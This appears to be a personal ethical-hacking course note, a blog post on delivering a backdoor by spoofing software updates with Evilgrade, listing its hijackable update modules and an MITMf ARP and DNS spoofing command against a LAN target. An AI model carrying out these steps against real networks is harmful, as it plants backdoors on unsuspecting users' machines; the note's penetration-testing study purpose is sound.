Ethical Hacking - GAINING ACCESS(12)

Posted 2021-03-18 keepmoving1113

CLIENT SIDE ATTACKS

Backdoor delivery method1 - Spoofing Software Updates

Fake an update for an already installed program.

Install the backdoor instead of the update.

Require DNS spoofing + Evilgrade(a server to serve the update).

1. Download and install Evilgrade.

https://github.com/infobyte/evilgrade

git clone https://github.com/infobyte/evilgrade.git

cd evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML

 

 

 

 

 

 

 

 

 OR

apt-get install isr-evilgrade

 

 

 

2. Start Evilgrade. 

evilgrade

 

 

 

 

3. Check programs that can be hijacked.

show modules

 

List of modules:
===============

acer
allmynotes
amsn
appleupdate
appstore
apptapp
apt
asus
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
fsecure_client
getjar
gom
googleanalytics
growl
inteldriver
isopen
istat
itunes
jdtoolkit
jet
jetphoto
keepass
lenovo
lenovoapk
lenovofirmware
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openbazaar
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
port
quicktime
safari
samsung
skype
soapui
sparkle
sparkle2
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
timedoctor
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 80 modules available.

 

4. Select one

configure [module]

 

5. Set backdoor location.

set agent [agent location]

 

 

 

 

6. Start server

start

 

 

 

7. Start DNS spoofing and handler.

 Modify the mitmf.conf file.

 Start MITMF:

pyton2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.21 -i eth0 --dns

 

 Msf:

 

 

Install the update on target machine. Then you can run the backdoor program>>